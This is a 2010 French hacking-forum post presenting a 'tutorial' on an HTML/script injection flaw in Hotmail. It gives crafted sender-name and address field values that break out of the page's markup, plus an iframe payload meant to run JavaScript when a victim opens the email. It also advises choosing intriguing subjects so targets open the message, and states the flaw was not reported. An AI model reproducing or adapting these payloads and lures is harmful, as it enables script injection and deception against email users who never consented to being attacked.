[TUTO] Faille Hotmail


 
Poster un nouveau sujet   Répondre au sujet    OWN3D BY KrL Index du Forum -> French - Hacking -> Hacking tutorial
Sujet précédent :: Sujet suivant  
Auteur Message
XxViRuSxX
Invité

Hors ligne




MessagePosté le: Mar 6 Juil 2010 - 11:47    Sujet du message: [TUTO] Faille Hotmail Répondre en citant

Bonjour,

Je crois bien avoir une trouvé une petite trappe pour Hotmail.

Le seul outil nécessaire à l'exploitation de la faille, est un script de messagerie ou vous pouvez y mettre votre nom, votre e-mail, l'adresse Hotmail de la victime, le sujet et évidemment un message.

Personnellement, j'utilise un script qu'un ami a hébergé, et il ne veut pas que je donne l'URL. C'est un simple code PHP. Bref.

La faille consiste a envoyé un e-mail contenant un code. A l'ouverture du message, le code s'active.

Pour trouver cette faille, j'ai due faire environs 100 tests. Des tests contenant du décimal, hexa, [..] etc. Pour en arriver a un résultat plutôt banale.

Je vous fait parvenir ma petite découverte car je suis tanné de bidouiller dessus. En effet, j'ai réussi pour du code HTML, mais pas encore JavaScript. Même si le code Javascript est bien dans la source du message. Pareil pour une redirection.
Je crois que le problème est que le code est simplement pas dans les bonnes balises. Bref, ce sera a vous de bidouiller


Voici un exemple, avec des explications par la suite.



EXEMPLE


*1= Votre nom : Rocky Balboa-desrocher <

*2= Votre adresse : "[/s]</span></td></tr></tbody></table><font size="6">CIGARSSECURITY</font>

*3= Destinataire : Adresse Hotmail de la victime

*4= Sujet : Bah...Un sujet


*5= Message : No-comment



DEMONSTRATIONS


*1
Mettre un nom, de préférence composé pour la longueurs. Si le nom est trop court, une petite partie du script apparaitra.
IMPORTANT : Ne pas oublier le [ < ]

*2
Inscrivez le script. Ce script s'exécutera quand la victime va ouvrir le e-mail. Comme vous voyer, j'ai fermé plusieurs balises afin d'essayer d'aller directement dans le <body> pour y déposer un <script>
Dans mon exemple, un "CIGARSSECURITY" s'impose en size=6.
IMPORTANT : Ne pas oublier le [ " ]

*3
L'adresse Hotmail de la victime. Pas testé encore avec d'autre service comme Gmail.

*4
Une sujet intéressant, intriguant. Étant donné que le mail atterri dans le "courrier indésirable", il est important d'intriguer la victime, ou de la mettre en confiance.

*5
Un message totalement inutile.




Donc voilà, c'était en gros la faille que j'ai déniché. À vous de l'essayer, l'améliorer... J'ai pas envoyé de Mail a Hotmail encore, car le HTML est pas très dangereux.

Si vous avez fait des tests, il sera sympathique d'exposer vos résultats, etc.

Si vous avez des idées aussi !! Des commentaires..

À noter que cet article est a but informatif, je suis en aucun cas responsable de vos actes !



Hacktivistement & Cigarement les amis !




EDIT : Pour le JavaScript, suffit de se servir de la balise <iframe> pour l'introduire.


"[/s]</span></td></tr></tbody></table><HTML><HEAD><TITLE>cigars</TITLE></HEAD><BODY><IFRAME src=lesiteaveclescript width=600 height=200 scrolling=auto frameborder=0 > </IFRAME></BODY></HTML>


N.B : J'ai seulement testé ce coup avec un site contenant une "alert" mais je crois que ca va fonctionner pour tout les autres script.






l'image dépasse la taille maximal autoriser. Cliquez pour voir l'image en taille réelle


Revenir en haut
Publicité






MessagePosté le: Mar 6 Juil 2010 - 11:47    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    OWN3D BY KrL Index du Forum ->
   Hacking tutorial
Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

 
Sauter vers:  
Index | créer un forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation